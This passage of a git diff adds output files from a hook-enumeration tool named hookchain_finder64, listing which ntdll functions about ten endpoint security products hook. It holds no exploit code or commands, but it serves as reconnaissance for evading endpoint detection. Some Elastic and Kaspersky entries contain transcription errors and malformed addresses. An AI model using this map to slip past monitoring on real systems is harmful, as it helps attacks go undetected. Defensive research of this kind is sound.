+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphusr64.dll is loaded at 0x00007ffa88520000.
+ 
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SBA_ISWWH.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at cphnt64.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at WS2_32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at RPCRT4.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at USER32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at GDI32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at gdi32full.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ADVAPI32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at sechost.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SHELL32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at Secur32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at WINSPOOL.DRV IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ODBC32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at CRYPT32.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SSPICLI.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at DPAPI.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at IMM32.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at windows.storage.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at combase.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at Wldp.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at SHCORE.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at shlwapi.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at ntmarta.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at cphusr64.dll IAT
+  +-- 0 hooked functions.
+ 
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/cortex.txt b/enum/results_enum/cortex.txt
new file mode 100644
index 0000000..79832dd
--- /dev/null
+++ b/enum/results_enum/cortex.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff666a00000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8a6130000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8a5e90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8a5b90000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8a0fd0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8a4130000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/crowdstrike.txt b/enum/results_enum/crowdstrike.txt
new file mode 100644
index 0000000..e25e4bf
--- /dev/null
+++ b/enum/results_enum/crowdstrike.txt
@@ -0,0 +1,55 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtAllocateVirtualMemoryEx is hooked
+NtCreateMutant is hooked
+NtDeviceIoControlFile is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendThread is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\lab\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6bf510000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff95f1d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff95e4e0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff95c510000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959860000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff95ef80000.
+C:\Windows\System32\umppc18110.dll is loaded at 0x0000021457050000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at umppc18110.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/defender.txt b/enum/results_enum/defender.txt
new file mode 100644
index 0000000..a2f9c08
--- /dev/null
+++ b/enum/results_enum/defender.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff77bc30000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8ee910000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff8eca90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8ec590000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8e9720000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff8ee290000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/defender_atp.txt b/enum/results_enum/defender_atp.txt
new file mode 100644
index 0000000..b220b52
--- /dev/null
+++ b/enum/results_enum/defender_atp.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff73b750000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffce6370000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffce4b50000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffce3b30000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffce1160000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffce6070000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/elastic.txt b/enum/results_enum/elastic.txt
new file mode 100644
index 0000000..6b998f3
--- /dev/null
+++ b/enum/results_enum/elastic.txt
@@ -0,0 +1,29 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff647010000.
+C: \Windows \System32\KERNEL32.DLL is loaded at 0x00007f95d0a0000.
+C: \Windows\System32\KERNELBASE.dl1 is loaded at 0x00007f95bd90000.
+C: \Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff959060000.
+C: \Windows\System32\msvert.dll is loaded at 0x00007ff95c450000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvert.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/eset.txt b/enum/results_enum/eset.txt
new file mode 100644
index 0000000..1996d6c
--- /dev/null
+++ b/enum/results_enum/eset.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7ed380000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffe3be50000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffe39f90000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffe39640000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffe36de0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffe3bb20000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/kaspersky.txt b/enum/results_enum/kaspersky.txt
new file mode 100644
index 0000000..bdc3315
--- /dev/null
+++ b/enum/results_enum/kaspersky.txt
@@ -0,0 +1,27 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6c3400000.
+C:\Windows\System32\ntdll.dll is loaded at 0x00007f9e3930000.
+C:\Windows\System32\KERNEL32.DLL is loaded at exe0007ff9e3210000.
+C:\Windows\System32\KERNELBASE.dl1 is loaded at 0x00007ff9e1640000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff9elae0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
diff --git a/enum/results_enum/malwarebytes.txt b/enum/results_enum/malwarebytes.txt
new file mode 100644
index 0000000..0eb98ac
--- /dev/null
+++ b/enum/results_enum/malwarebytes.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff6e2cc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb55570000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb55470000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb53020000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb504f0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb539e0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/sentinelone.txt b/enum/results_enum/sentinelone.txt
new file mode 100644
index 0000000..03692a5
--- /dev/null
+++ b/enum/results_enum/sentinelone.txt
@@ -0,0 +1,445 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtCreateThreadEx is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtFreeVirtualMemory is hooked
+NtLoadDriver is hooked
+NtMapUserPhysicalPages is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff770d10000.
+C:\WINDOWS\SYSTEM32\ntd1l.dll is loaded at 0x0000015158f10000.
+C:\WINDOWS\System32\kern3l32.dll is loaded at 0x0000015159110000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff9e1290000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff9e0250000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff9de950000.
+C:\Program Files\SentinelOne\Sentinel Agent 23.3.3.264\InProcessClient64.dll is loaded at 0x00007ff9de4d0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ff9e0780000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff9df9a0000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ff9e0530000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ff9df2d0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ff9decc0000.
+C:\WINDOWS\SYSTEM32\FLTLIB.DLL is loaded at 0x00007ff9de460000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ff9defb0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtMapUserPhysicalPagesScatter is hooked to 0x00007ff9e132d030
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtRaiseHardError is hooked to 0x00007ff9e132fce0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtReplacePartitionUnit is hooked to 0x00007ff9e132fea0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtIsSystemResumeAutomatic is hooked to 0x00007ff9e132f020
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtInitiatePowerAction is hooked to 0x00007ff9e132f000
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationDebugObject is hooked to 0x00007ff9e13302a0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtFindAtom is hooked to 0x00007ff9e132d250
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationAtom is hooked to 0x00007ff9e132f8c0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtAddAtomEx is hooked to 0x00007ff9e132dce0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeleteAtom is hooked to 0x00007ff9e132e9c0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtFlushKey is hooked to 0x00007ff9e132ed00
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobSet is hooked to 0x00007ff9e132e5a0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetInformationJobObject is hooked to 0x00007ff9e13302e0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryInformationJobObject is hooked to 0x00007ff9e132f920
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateJobObject is hooked to 0x00007ff9e132e580
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtAssignProcessToJobObject is hooked to 0x00007ff9e132e1a0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtTerminateJobObject is hooked to 0x00007ff9e13307e0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtOpenJobObject is hooked to 0x00007ff9e132f3c0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetEaFile is hooked to 0x00007ff9e1330220
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtCreateMailslotFile is hooked to 0x00007ff9e132e620
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtPowerInformation is hooked to 0x00007ff9e132dba0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtGetDevicePowerState is hooked to 0x00007ff9e132ee80
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetThreadExecutionState is hooked to 0x00007ff9e13305a0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetSystemEnvironmentValueEx is hooked to 0x00007ff9e1330520
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQuerySystemEnvironmentValueEx is hooked to 0x00007ff9e132fbe0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetVolumeInformationFile is hooked to 0x00007ff9e1330640
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryAttributesFile is hooked to 0x00007ff9e132d770
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryFullAttributesFile is hooked to 0x00007ff9e132f8a0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtSetTimerResolution is hooked to 0x00007ff9e1330600
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtQueryTimerResolution is hooked to 0x00007ff9e132fc20
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+  |-- KERNEL32.DLL IAT to ntdll.dll of function NtApphelpCacheControl is hooked to 0x00007ff9e132d950
+  |-- KERNEL32.DLL IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+  +-- 81 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryWnfStateData is hooked to 0x00007ff9e132fc40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeDirectoryFileEx is hooked to 0x00007ff9e132f2e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCopyFileChunk is hooked to 0x00007ff9e132e420
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEaFile is hooked to 0x00007ff9e132f880
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtFlushBuffersFile is hooked to 0x00007ff9e132d930
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenMutant is hooked to 0x00007ff9e132f460
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseMutant is hooked to 0x00007ff9e132d3d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKeyTransacted is hooked to 0x00007ff9e132e5c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDirectoryFile is hooked to 0x00007ff9e132d670
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetDefaultLocale is hooked to 0x00007ff9e13301c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteValueKey is hooked to 0x00007ff9e132eaa0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateValueKey is hooked to 0x00007ff9e132d230
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInstallUILanguage is hooked to 0x00007ff9e132f9e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetNlsSectionPtr is hooked to 0x00007ff9e132ef00
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapViewOfSection is hooked to 0x00007ff9e132d4d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryDefaultLocale is hooked to 0x00007ff9e132d270
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtNotifyChangeKey is hooked to 0x00007ff9e132f300
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryLicenseValue is hooked to 0x00007ff9e132fa40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
